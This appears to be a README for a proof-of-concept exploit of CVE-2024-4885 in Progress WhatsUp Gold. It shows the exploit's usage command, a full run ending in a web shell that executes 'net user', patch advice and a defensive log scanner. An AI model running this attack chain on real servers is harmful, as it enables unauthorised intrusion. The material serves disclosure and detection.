CVE-2024-4885: PoC for Progress WhatsUp Gold GetFileWithoutZip Unauthenticated Remote Code Execution (CVE-2024-4885)
A root cause analysis of the vulnerability can be found on my blog: https://summoning.team/blog/progress-whatsup-gold-rce-cve-2024-4885/
python3 CVE-2024-4885.py -t http://192.168.0.231:9642 -s 192.168.0.181:1337 -f hax.aspx
(*) Progress WhatsUp Gold GetFileWithoutZip Unauthenticated Remote Code Execution (CVE-2024-4885)
(*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam)
(*) Technical details: https://summoning.team/blog/progress-whatsup-gold-rce-cve-2024-4885/
(^_^) Prepare for the Pwnage (^_^)
(+) Sending payload to http://192.168.0.231:9642/NmConsole/ReportService.asmx
(*) Callback server listening on http://192.168.0.181:1337
(+) Payload sent successfully
(*) Checking if target is using HTTPS or HTTP https://192.168.0.231/NmConsole/
(*) Target host: https://192.168.0.231
(*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-24.aspx
(+) Callback received
192.168.0.231 - - [06/Jul/2024 23:31:30] "GET /Session/Login/?sUsername=admin&sPassword=3,0,0,0,16,0,0,0 HTTP/1.1" 200 -
192.168.0.231 - - [06/Jul/2024 23:31:30] "PUT /api/core/render HTTP/1.1" 200 -
(*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-25.aspx
(*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-26.aspx
(*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-27.aspx
(*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-28.aspx
(*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-29.aspx
(*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-30.aspx
(*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-31.aspx
(*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-32.aspx
(*) spraying... https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-33.aspx
(+) Web shell found at -> https://192.168.0.231/NmConsole/Data/ExportedReports/a70d6fde3f82e3b9_2024-07-06_23-31-33.aspx
Shell> net user
User accounts for
-------------------------------------------------------------------------------
Administrator debugger DefaultAccount Guest WDAGUtilityAccount
The command completed with one or more errors.
Shell>
Update to the latest version or mitigate by following the instructions in the Progress advisory:
https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-June-2024
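
For checking an existing installation alongside patching, the following is an added example (not part of the PoC or of the Progress advisory) that scans web server logs for the two artifacts visible in the run above: requests for script files under /NmConsole/Data/ExportedReports/ and one client probing many distinct such paths. It assumes W3C extended logs with a `#Fields:` header; the extension list, the threshold and the sample log lines are constructed assumptions.

```python
import re
from collections import defaultdict

# Server-side script files requested from the report export directory seen in
# the PoC output. Exported reports are not expected to be scripts.
# The extension list is an assumption; adjust it for your environment.
SUSPICIOUS = re.compile(
    r"^/NmConsole/Data/ExportedReports/[^/?]+\.(aspx|ashx|asmx|asp)$", re.I)


def scan(lines, spray_threshold=5):
    """Scan W3C extended log lines (column order taken from '#Fields:').

    Returns (hits, sprayers):
      hits     - (date, time, client, path) for suspicious paths answered 200
      sprayers - clients that requested >= spray_threshold distinct such paths
    """
    fields, hits, seen = [], [], defaultdict(set)
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        path = row.get("cs-uri-stem", "")
        if not SUSPICIOUS.match(path):
            continue
        client = row.get("c-ip", "-")
        seen[client].add(path.lower())
        if row.get("sc-status") == "200":
            hits.append((row.get("date"), row.get("time"), client, path))
    sprayers = sorted(c for c, p in seen.items() if len(p) >= spray_threshold)
    return hits, sprayers


# Constructed sample log (documentation IP ranges, made-up file name prefix).
BASE = "/NmConsole/Data/ExportedReports/"
SAMPLE_LOG = ["#Fields: date time c-ip cs-method cs-uri-stem sc-status"]
for sec in range(24, 33):
    SAMPLE_LOG.append(f"2024-07-06 23:31:{sec} 192.0.2.10 GET "
                      f"{BASE}0123456789abcdef_2024-07-06_23-31-{sec}.aspx 404")
SAMPLE_LOG.append("2024-07-06 23:31:33 192.0.2.10 GET "
                  f"{BASE}0123456789abcdef_2024-07-06_23-31-33.aspx 200")
SAMPLE_LOG.append(f"2024-07-06 23:40:00 192.0.2.20 GET {BASE}report.pdf 200")

if __name__ == "__main__":
    found, probing = scan(SAMPLE_LOG)
    print("200 responses for script files:", found)
    print("clients probing many paths:", probing)
```

A 200 response for a script file in that directory is a reason to inspect the ExportedReports folder on disk for files that are not reports.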
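SinSinology
SummoningTeam
This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.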